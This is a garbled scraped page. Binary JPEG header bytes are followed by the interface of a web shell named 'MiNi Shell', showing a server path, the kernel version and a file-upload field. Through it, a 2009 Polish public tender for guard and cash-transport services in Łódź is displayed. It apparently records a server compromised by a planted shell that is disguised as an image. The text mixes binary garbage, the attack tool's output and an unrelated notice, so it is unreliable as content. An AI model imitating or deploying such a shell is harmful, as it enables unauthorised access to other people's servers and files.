JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090910/313828-N-2009.html

<p class="kh_header"><b>Łódź: świadczenie na rzecz Administracji Nieruchomościami Łódź- Śródmieście Centrum II usługi ochrony fizycznej mienia, monitoring, ochronę transportu wartości pieniężnych- inkaso</b><br>
<b>Numer ogłoszenia: 313828 - 2009; data zamieszczenia: 10.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Śródmieście "Centrum II" , ul. Dowborczyków 5, 90-019 Łódź, woj. łódzkie, tel. 042 2536419, faks 042 2536422.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum2.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie na rzecz Administracji Nieruchomościami Łódź- Śródmieście Centrum II usługi ochrony fizycznej mienia, monitoring, ochronę transportu wartości pieniężnych- inkaso.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
świadczenie na rzecz Zamawiającego usługi stałej, bezpośredniej ochrony fizycznej mienia, Zamawiający wymaga, aby Wykonawca przy pomocy wskazanych  przez siebie pracowników ochrony sprawował stałą, bezpośrednią ochronę fizyczną mienia  budynków,  pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach, monitorowania sygnałów lokalnego systemu alarmowego w nieruchomości-  położonej w Łodzi przy  ul. Dowborczyków 5 (poprzeczna  i tylna oficyna)  budynek biurowy- w którym znajduje się między innymi siedziba AN CII, oraz ochrona    transportu wartości pieniężnych-inkaso 
CPV 79.71.00.00-4 usługi ochroniarskie, 60.10.00.00-9 sługi w zakresie transportu drogowego

Zakres czynności obejmuje:
1.1Bezpośrednią ochronę fizyczną osób i mienia:
-Bezpośrednia ochrona fizyczna osób i mienia przez jednego pracownika ochrony w dni robocze w godzinach 15oo - 20oo
Maksymalna ilość godzin pracy wartowników w okresie realizacji zamówienia wynosi 1275. 
-Wartownik podejmując służbę wprowadza wpis potwierdzony podpisem i godziną w książce służby, dokonuje obchodu terenu 
-Wartownik będzie wydawał klucze od poszczególnych pomieszczeń zajmowanych przez Administrację, korytarzy, pomieszczeń socjalnych i toalet osobom upoważnionym do ich sprzątania. Po zakończonej pracy, osoby sprzątające będą przekazywały klucze Wartownikowi, który po uprzednim sprawdzeniu, czy wszystkie pomieszczenia zostały prawidłowo zamknięte załączy wewnętrzny system alarmowy przed zakończeniem służby.
- Wartownik ma obowiązek regularnego obchodu obiektu : przynajmniej trzy razy w godzinach swojej pracy - każdy obchód będzie potwierdzony wpisem do książki służby.
-Wartownik w trakcie służby nie jest uprawniony do dokonywania jakichkolwiek czynności nie związanych z ochroną a w szczególności nie ma prawa do korzystania z telefonów, faksów, komputerów oraz do przeglądania dokumentów znajdujących się w lokalach.
- W razie niebezpieczeństwa wartownik ma obowiązek zawiadomienia Zleceniodawcy, Zleceniobiorcy oraz odpowiednich służb zwłaszcza Policji, Straży Pożarnej i Pogotowia.

1.2. Monitorowanie sygnałów lokalnego systemu alarmowego oraz podejmowania interwencji w w/w obiekcie.
- Monitorowanie sygnałów lokalnego systemu alarmowego polegać będzie na przyjmowaniu sygnałów z lokalnego systemu alarmowego oraz przekazywaniu odpowiadających tym sygnałom informacji wskazanym przez Zamawiającego osobom lub instytucjom
- Zleceniobiorca zobowiązuje się do podejmowania interwencji na każdy sygnał alarmowy odebrany przez centrum monitorowania z lokalnego systemu alarmowego lub w uzasadnionych przypadkach na wezwanie pracownika ochrony wykonującego swoje obowiązki w siedzibie Zamawiającego. Grupa interwencyjna będzie liczyła minimum dwie osoby 
- Interwencja zmierzać ma do udaremnienia powstania szkody w  mieniu Zleceniodawcy
-Monitorowanie sygnałów lokalnego systemu alarmowego odbywa się w systemie całodobowym
- Interwencja zostanie podjęta :
w godzinach 19,00-6,00  - w czasie 5 minut,
w godzinach 6,00-19,00 - w czasie  15 minut

1.3. Ochrona transportu wartości pieniężnych - inkaso
- Odbiór wartości pieniężnych opakowanych w Bezpieczną Kopertę ( lub inny przedmiot  o podobnym zastosowaniu) w kwocie wskazanej na bankowym dowodzie wpłaty przygotowanym przez kasjera Zamawiającego, 
dwa razy w tygodniu:
wtorki  w godzinach 16oo -163o
piątki w godzinach 143o -15oo
oraz w jednostkowych przypadkach (1-2 razy w miesiącu) na żądanie -wezwanie telefoniczne poza wyznaczonymi dniami tygodnia 
(Bezpieczne Koperty zostaną Zamawiającemu przekazane przez Zleceniobiorcę- ich koszt należy wliczyć w cenę usługi inkasa )

- konwojowaniu i dostarczeniu wartości pieniężnych / depozytów bankowych/ odebranych od kasjera, z zastosowaniem zabezpieczeń wymaganych przez przepisy dotyczące ochrony wartości pieniężnych w tym w szczególności przewidziane w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z 14.10.1998r (Dz.U.129 poz 858 z późn.zm) i dostarczanie wartości pieniężnych do banku prowadzącego rachunek Zamawiającego. Od momentu przyjęcia bezpiecznej koperty Zleceniobiorca ponosi  pełną odpowiedzialność za jej zniszczenie, utratę lub zagarnięcie, do momentu zdeponowania w Banku Zleceniodawcy. Zleceniobiorca nie ponosi odpowiedzialności  za zgodność deklarowanych, na bezpiecznych kopertach kwot z dokumentami kasowymi i bankowymi w przypadkach dostarczenia bezpiecznej koperty w formie nienaruszonej.
- Przewidywane wielkości kwot do dostarczenia do banku kształtują się średnio w przedziale 400000 złotych miesięcznie.
- Planowana ilość konwojów w miesiącu 9-10.
1.4. Wykonawca ma prawo złożyć tylko jedną ofertę.
1.5.Zamawiający nie dopuszcza składania ofert  wariantowych i częściowych
1.6. Zamawiający zastrzega możliwość zmiany przyszłej umowy w przypadku wystąpienia okoliczności nie wynikających z winy Wykonawcy ani Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla Zamawiającego. 
1.7.Zamawiający informuje, iż nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 ustawy Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 3.1    O zamówienie mogą ubiegać się Wykonawcy, którzy:
3.1.1.  posiadają uprawnienia do wykonywania określonej działalności lub czynności,    
3.1.2. dysponują osobami i urządzeniami technicznymi niezbędnymi  do wykonania zamówienia
3.1.3.  posiadają niezbędną wiedzę i doświadczenie
3.1.4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie        zamówienia,  
3.1.5. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy)
       
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 4 niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1 W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty:
4.1.1 aktualny odpis z właściwego rejestru albo aktualnego  zaświadczenia o wpisie do ewidencji działalności gospodarczej     oryginał lub kserokopia potwierdzona za    
zgodność z  oryginałem przez uprawnionego oferenta, wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert   
 4.1.2 aktualną koncesję na prowadzenie działalności w zakresie ochrony osób i mienia oraz wartości pieniężnych,      
 4.1.3 aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
4.1.4 aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( w przypadku, gdy  Oferent może ubiegać się o wydanie powyższego zaświadczenia na mocy odrębnych przepisów)
4.1.5 aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, oryginał lub kserokopia poświadczona  za zgodność z  oryginałem przez uprawnionego wykonawcę
4.1.6  wykaz osób, które będą skierowane do realizacji zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, Zamawiający wymaga aby każda z osób skierowanych do realizacji zadania posiadała minimum 6 miesięczny staż pracy  polegający na pełnieniu obowiązków porównywalnych z tymi, które zostaną im powierzone do realizacji niniejszego zamówienia ( staż pracy winien być nabyty w ciągu ostatnich trzech lat kalendarzowych licząc od dnia składania ofert )
Zamawiający wymaga aby do realizacji zostali skierowani nie karani pracownicy pełniący funkcje:
- minimum jeden wartownik, 
- minimum 10 pracowników  5 grup interwencyjnych jakie posiada oferent na terenie Łodzi pozostającymi w stałej gotowości do podjęcia natychmiastowej reakcji,
-  minimum 2 pracowników ochrony skierowanych do odbioru wartości pieniężnych z kasy Zamawiającego,
- minimum jedna osoba upoważniona przez Oferenta do kontaktów z Zamawiającym w trakcie realizacji zamówienia -  tabela w formie oryginału na załączniku nr 2 do siwz, kopie uprawnień w formie kserokopii poświadczonej za zgodność przez uprawnionego oferenta.
4.1.7wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada Wykonawca  w tym :  
-  1 telefon komórkowy, w który zostanie wyposażony pracownik ochrony(wartownik wykonujący zamówienie na terenie nieruchomości położonej w Łodzi przy ul. Dowborczyków 5) , 
- minimum 1 środek transportu przystosowanego do bezpiecznego przewozu wartości pieniężnych mającego stałą łączność z centralą oraz patrolami interwencyjnymi,
- minimum 5 pojazdów dla grup interwencyjnych,
- stacja monitorowania radiowego zagrożeń alarmowych oraz posiadanie wewnętrznego środka łączności, -  tabela w formie oryginału na załączniku nr 3 do siwz
4.1.8 wykaz minimum dwóch  kontraktów wykonania , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług porównywalnych swoim rodzajem z usługami stanowiącymi przedmiot zamówienia w okresie ostatnich trzech lat, tj. do terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, z podaniem ilości,  przedmiotu, dat wykonania i odbiorców zał. nr 4 do siwz - oryginał, oraz załączenie dokumentów potwierdzających, że usługi  zostały wykonane należycie i obejmowały swoim zakresem  przedmiot zamówienia. Referencje muszą być podpisane przez osobę uprawnioną do reprezentowania podmiotu
  4.1.9 polisę lub inny dokument ubezpieczenia( w przypadku braku polisy) potwierdzający że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności gospodarczej, w tym działalności zgodnej  przedmiotem niniejszego zamówienia na minimalną łączną kwotę 100.000 zł ( sto tysięcy złotych) - kserokopia  poświadczona  za  zgodność z  oryginałem przez wykonawcę.
W przypadku gdy okres ważności polisy jest   krótszy od    terminu związania ofertą -należy załączyć zobowiązanie - oświadczenie Wykonawcy do przedłużenia ważności ubezpieczenia na czas realizacji zamówienia        
 4.1.10 świadczenie  , że wykonawca spełnia warunki udziału w postępowaniu, określone w  art. 22 ust. 1pkt 1-3 ustawy  , zał nr 5 do siwz
 4.1.11 oświadczenie  , że wykonawca nie podlega wykluczeniu z postępowania o udzielenia zamówienia publicznego zgodnie z art. 24 ust 1 i 2 ustawy P.z.p, zał nr 6 do siwz
 Brak jakiegokolwiek z wyżej wymienionych oświadczeń lub dokumentów z zastrzeżeniem art. 26 ust. 3 ustawy Pzp spowoduje wykluczenie Wykonawcy z postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.centrum2.com3.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź- Śródmieście Centrum II 90-019 Łódź, ul. Dowborczyków 5 pok 15 lub 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2009 godzina 09:00, miejsce: Administracja Nieruchomościami Łódź- Śródmieście Centrum II 90-019 Łódź, ul. Dowborczyków 5 pok 19 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com